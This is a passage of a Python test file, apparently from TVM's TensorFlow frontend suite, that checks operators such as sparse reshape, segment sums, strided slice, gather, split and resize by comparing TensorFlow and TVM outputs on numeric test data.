np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
""" sparse_reshape op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
if default_value == None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
)
def test_forward_sparse_to_dense():
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
compare_tf_with_tvm([], [], result.name)
def test_forward_sparse_to_dense_v2():
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
""" One iteration of tf.sparse.add """
# TODO(ANSHUMAN87): support cuda
# TODO(ANSHUMAN87): support both sparse input case
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
# TODO(ANSHUMAN87): support user input threashold values
if flip:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
""" sparse.add op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
""" One iteration of a Stridedslice """
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
def _test_forward_truncatemod(ip_shape, dtype):
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
def _test_gather(ip_shape, indice_shape, indice_value, axis, dtype):
""" One iteration of a GatherV2 """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
def _fill_indices(indice_value):
indices = np.array(ip_shape, dtype=dtype)
if isinstance(indice_value, int):
indices = np.array([indice_value], dtype="int32")
else:
indices = np.asarray(indice_value, dtype="int32")
return indices
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, "int32")
_test_gather((4,), (1,), 1, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, "float32")
#######################################################################
# GatherND
# --------------------------
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
def check_bias_add(lh_shpae, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shpae).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
""" One iteration of a Split """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
if tf.__version__ < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
out_node = [out.strip(":0") for out in out_name]
in_node = [inp.strip(":0") for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
""" One iteration of resize bilinear """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
""" One iteration of resize nearest neighbor """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
""" One iteration of resize nearest neighbor for graph with dynamic input shape """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
""" Resize Bilinear, Nearest_Neighbor """
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
